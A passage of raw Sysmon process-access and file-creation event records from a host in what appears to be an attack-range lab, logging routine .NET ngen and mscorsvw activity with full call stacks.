ll+51791 10341000x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.471{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-FE02-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.456{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.456{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:58.393{08A6967A-45EE-6000-FD02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\650-0\XsdBuildTask.dll2021-01-14 13:23:58.393 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.143{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-FD02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.127{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-FD02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.127{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-FD02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.002{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-FC02-000000009A01}1020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.987{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-FC02-000000009A01}1020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.987{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-FC02-000000009A01}1020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.956{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44E2-6000-2E01-000000009A01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.924{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-45EF-6000-3403-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.924{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-45EF-6000-3403-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.893{08A6967A-44E2-6000-2F01-000000009A01}41924056C:\Windows\system32\conhost.exe{08A6967A-45EF-6000-3403-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.893{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-3403-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.893{08A6967A-44E2-6000-2E01-000000009A01}41805064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{08A6967A-45EF-6000-3403-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FFF9FEE5147) 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.846{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-3303-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.831{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-3303-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.831{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-3303-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.815{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-3203-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.815{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-3203-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.815{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-3203-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.799{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-3103-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.784{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-3103-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.784{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-3103-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 